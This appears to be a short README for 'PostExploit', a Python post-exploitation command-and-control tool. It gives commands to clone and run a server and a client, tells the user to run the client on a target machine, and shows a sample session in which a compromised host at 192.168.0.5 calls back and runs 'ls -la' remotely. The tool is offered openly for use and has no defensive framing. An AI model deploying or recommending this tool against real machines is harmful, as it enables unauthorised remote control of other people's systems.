A simple Post Exploitation C2 Tool
$ git clone https://github.com/krishpranav/PostExploit
$ python3 server.py
$ python3 client.py
- how to use this tool??
$ run the client script on the target machine
$ and run the server in your machine
- an example of running a simple powershell command on the target machine by post exploitation method
[*] Received callback from '192.168.0.5'
[+] Command to run?
192.168.0.5> ls -la
[*] Command Sent: ls -la
[*] Command Sent: ls -la
[+] Results from 192.168.0.5
total 32
file one
file two